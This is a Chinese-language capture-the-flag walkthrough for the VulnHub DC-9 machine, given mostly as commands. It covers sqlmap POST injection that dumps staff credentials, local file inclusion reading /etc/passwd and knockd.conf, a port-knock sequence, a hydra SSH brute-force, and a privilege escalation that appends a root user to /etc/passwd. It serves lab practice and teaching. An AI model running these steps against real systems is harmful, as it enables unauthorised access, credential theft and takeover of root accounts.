1.官网下载地址:
https://www.vulnhub.com/entry/dc-9,412/
2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段
攻击机:kali (192.168.88.130)
老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132
查看开放端口,22端口被过滤,登录80端口查看
nmap -sV -p- -A 192.168.88.132
登录页面,发现有两个地方可以操控,可能是sql注入,对http://192.168.88.132/manage.php操作,发现无果,接着尝试另一个search页面
http://192.168.88.132/manage.php
http://192.168.88.132/search.php
输入1’ 报错,说明存在sql注入,但查看url,发现为post注入
在搜索框输入123后使用sqlmap自动跑,爆数据库名
sqlmap -u http://192.168.88.132/results.php --data="search=123" -dbs
根据第六感首先查看users数据库,发现并没有什么利用价值
紧接着我们查看staff数据库,爆表名
sqlmap -u http://192.168.88.132/results.php --data="search=123" -D Staff -tables -batch
sqlmap -u http://192.168.88.132/results.php --data="search=123" -D Staff -T Users -columns -batch
爆用户名密码,这里一路回车,使用sqlmap自带的字典跑出明文密码,但是这里出了点意外,需要多试几次。实在跑不出来用md5在线解密网站,这里推荐一个网站。
https://hashes.com/en/decrypt/hash
sqlmap -u http://192.168.88.132/results.php --data="search=123" -D Staff -T Users -C Username,Password -dump
登录账号admin/transorbital1,发现一个疑似文件包含(LFI)的漏洞
我们验证一下是否为LFI漏洞,成功包含
http://192.168.88.132/manage.php?file=../../../../etc/passwd
想到之前的22端口被过滤掉,可能是因为安装了端口敲门服务,端口敲门服务默认的配置文件路径为:/etc/knockd.conf
端口敲门服务通俗的理解为类似于一种特工的暗号,例如有规律的敲击三下房门,房间内的人才会把门打开。具体解释见下方链接:
https://zhuanlan.zhihu.com/p/59488488
https://www.cnblogs.com/xiaoxiaoleo/p/8523322.html
http://192.168.88.132/manage.php?file=../../../../etc/knockd.conf
nmap -p 7469 192.168.88.132
nmap -p 8475 192.168.88.132
nmap -p 9842 192.168.88.132
https://www.cnblogs.com/yanzi2020/p/14778112.html
knock 192.168.88.132 7469 8475 9842
将users数据库UserDetails表中的字段信息分别存储在username.txt和passwd.txt两个文件中。
hydra -L username.txt -P passwd.txt ssh://192.168.88.132
登录janitor/Ilovepeepee账户,发现一个隐藏文件
ssh [email protected]
将隐藏文件的密码放入passwd中,再次解密发现一个新账号fredf/B4-Tru3-001
查看fredf用户可以哪些具有root权限的命令
发现一个test.py的文件
py文件的含义为:读取参数1的内容,然后将参数1的内容写入到参数2的内容中。
那我们可以构造一个root权限用户,将该用户信息写入文件内,将改文件作为参数1,/etc/passwd作为参数2,这样就创建了一个root权限用户,就能实现提权了
openssl passwd -1 -salt yiqiyihui 123456
-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密
在kali中使用openssl创建一个加密本地用户
在/tmp下创建flag的文件,使用sudo用test文件运行这个文件
echo 'yiqiyihui:$1$yiqiyihu$6pPhTsjJB3HQUd80pSDEe1:0:0::/root:/bin/bash' >>/tmp/flag